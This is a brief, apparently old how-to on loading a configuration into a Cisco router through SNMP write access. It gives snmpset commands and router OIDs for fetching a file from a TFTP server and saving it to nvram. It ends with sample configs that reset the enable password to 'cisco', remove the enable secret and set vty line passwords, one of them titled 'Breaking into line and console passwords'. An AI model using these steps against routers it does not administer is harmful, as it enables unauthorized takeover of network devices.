You obviously need snmp write access to do this.  Also, read the MIBs
involved for more detail.
These can be done using any snmpset utililty, the examples assume UCD-SNMP.
Syntax may vary.
I recommend using SNMPv3 if you are using write access on a network device
(for obvious security
reasons).

snmpset <host> <snmp passphrase> .1.3.6.1.4.1.9.2.1.53.#.#.#.# octetstring
router-confg

where:
the snmp passphrase is the router read-write snmp community string (as in
'snmp-server community private RW')
host is the ip (or DNS name) of the router
#.#.#.# is the ip of the tftp server in which the router-confg file resides
in the /tftpboot directory
router-confg is the name of the file in the /tftpboot directory

After the file is written to ram, copy it to nvram:
snmpset <host> <snmp passphrase> .1.3.6.1.4.1.9.2.1.54.0 i 1

where:
the snmp passphrase is the router read-write snmp community string (as in
'snmp-server community private RW').
<host> is the ip (or DNS name) of the router.
"i" is representing an integer value.

routr-confg files:

Enable password changing/recovery through snmp:
!
enable password cisco
no enable secret
!
end

Breaking into line and console passwords through snmp:
!
line vty 0 4
login
password cisco